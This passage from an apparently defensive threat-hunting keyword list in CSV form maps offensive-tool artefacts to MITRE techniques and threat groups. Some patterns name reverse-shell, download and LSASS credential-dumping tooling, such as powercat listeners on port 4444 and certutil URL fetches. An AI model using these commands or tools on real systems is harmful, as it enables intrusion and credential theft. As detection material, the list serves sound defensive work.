T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55111" "*PostExploitation.psm1*",".{0,1000}PostExploitation\.psm1.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","55112" "*postgres_default_pass.txt*",".{0,1000}postgres_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55113" "*postgres_default_user.txt*",".{0,1000}postgres_default_user\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55114" "*POSTMiniDump.Data*",".{0,1000}POSTMiniDump\.Data.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","#content","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55115" "*POSTMiniDump.MiniDump*",".{0,1000}POSTMiniDump\.MiniDump.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","#content","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55116" "*POSTMiniDump.Utils*",".{0,1000}POSTMiniDump\.Utils.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","#content","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55117" 
"*PostMulitDomainSpider.py*",".{0,1000}PostMulitDomainSpider\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55118" "*PostMulitMsfGetDomainInfoByBloodHound.py*",".{0,1000}PostMulitMsfGetDomainInfoByBloodHound\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55119" "*PostPowershellPowerViewAddNetUser.py*",".{0,1000}PostPowershellPowerViewAddNetUser\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55120" 
"*PostPowershellPowerViewGetNetGroup.py*",".{0,1000}PostPowershellPowerViewGetNetGroup\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55121" "*PostPowershellPowerViewGetNetGroupMember.py*",".{0,1000}PostPowershellPowerViewGetNetGroupMember\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55122" "*PostPowershellPowerViewGetNetProcess.py*",".{0,1000}PostPowershellPowerViewGetNetProcess\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55123" 
"*PostPowershellPowerViewUserHunter.py*",".{0,1000}PostPowershellPowerViewUserHunter\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55124" "*postrequest/link.git*",".{0,1000}postrequest\/link\.git.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","55125" "*PostRewMsfAuxiliaryCVE*.py*",".{0,1000}PostRewMsfAuxiliaryCVE.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55126" "*PostRewMsfExample.py*",".{0,1000}PostRewMsfExample\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 
- T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55127" "*PostRewMsfPostConfInfos.py*",".{0,1000}PostRewMsfPostConfInfos\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55128" "*potato.exe -ip *",".{0,1000}potato\.exe\s\-ip\s.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068 - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","N/A","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","55129" "*PotatoAPI.Mode.DCOMRemote*",".{0,1000}PotatoAPI\.Mode\.DCOMRemote.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","55130" "*PotatoTrigger.cpp*",".{0,1000}PotatoTrigger\.cpp.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege 
Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","55131" "*PowerBreach.ps1*",".{0,1000}PowerBreach\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerBreach.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55134" 
"*PowerBruteLogon.*",".{0,1000}PowerBruteLogon\..{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","55135" "*PowerBruteLogon.zip*",".{0,1000}PowerBruteLogon\.zip.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","55136" "*powercat -c *",".{0,1000}powercat\s\-c\s.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","55137" "*powercat -c * -p *",".{0,1000}powercat\s\-c\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","0","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","55138" "*powercat -l *",".{0,1000}powercat\s\-l\s.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","55139" "*powercat -l -p 
4444*",".{0,1000}powercat\s\-l\s\-p\s4444.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","0","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","55140" "*Powercat.ps1*",".{0,1000}Powercat\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","55141" "*powerdump.ps1*",".{0,1000}powerdump\.ps1.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","55142" "*powerdump.ps1*",".{0,1000}powerdump\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55143" "*powerdump.rb*",".{0,1000}powerdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55144" "*PowerExtract-main.zip*",".{0,1000}PowerExtract\-main\.zip.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","55145" "*PowerForensics*",".{0,1000}PowerForensics.{0,1000}","offensive_tool_keyword","PowerForensics","The purpose of PowerForensics is to provide an all inclusive framework for hard drive forensic analysis. PowerForensics currently supports NTFS and FAT file systems. 
and work has begun on Extended File System and HFS+ support.","T1003 - T1039 - T1046 - T1057","TA0005 - TA0007 - TA0010","N/A","N/A","Reconnaissance","https://github.com/Invoke-IR/PowerForensics","1","1","N/A","N/A","N/A","10","1398","275","2023-11-16T10:31:37Z","2015-03-07T17:12:19Z","55146" "*powerglot.py*",".{0,1000}powerglot\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","55147" "*powerkatz.dll*",".{0,1000}powerkatz\.dll.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","55148" "*powerkatz.dll*",".{0,1000}powerkatz\.dll.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon 
- Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","https://www.virustotal.com/gui/file-analysis/YjU2NjE0YjBiOGNlMzNhZDVlYzRhYWFkMjJhNzQ4ZGQ6MTcyNDUyMDQ0Mw==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55149" "*powerkatz_x64.dll*",".{0,1000}powerkatz_x64\.dll.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","55150" "*powerkatz_x86.dll*",".{0,1000}powerkatz_x86\.dll.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","55151" "*PowerLessShell*",".{0,1000}PowerLessShell.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. 
You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","N/A","10","1498","256","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z","55152" "*PowerLessShell.py*",".{0,1000}PowerLessShell\.py.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","N/A","10","1498","256","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z","55153" "*powermad.ps1*",".{0,1000}powermad\.ps1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","N/A","10","1303","181","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z","55154" "*Powermad.psd1*",".{0,1000}Powermad\.psd1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","N/A","10","1303","181","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z","55155" "*Powermad.psm1*",".{0,1000}Powermad\.psm1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","Dispossessor - Black Basta","Exploitation 
tool","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","N/A","10","1303","181","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z","55156" "*Powermad-master*",".{0,1000}Powermad\-master.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","N/A","10","1303","181","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z","55157" "*PowerMemory*",".{0,1000}PowerMemory.{0,1000}","offensive_tool_keyword","PowerMemory","Exploit the credentials present in files and memory","T1003 - T1555 - T1213 - T1558","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/giMini/PowerMemory","1","0","N/A","N/A","N/A","9","840","204","2023-05-25T17:58:53Z","2015-08-29T17:09:23Z","55158" "*powerpick certutil.exe -urlcache -split -f *",".{0,1000}powerpick\scertutil\.exe\s\-urlcache\s\-split\s\-f\s.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","55159" "*powerpick -Command *",".{0,1000}powerpick\s\-Command\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 
- T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","55160" "*powerpick Get-*",".{0,1000}powerpick\sGet\-.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","55161" "*powerpick.py*",".{0,1000}powerpick\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","55162" 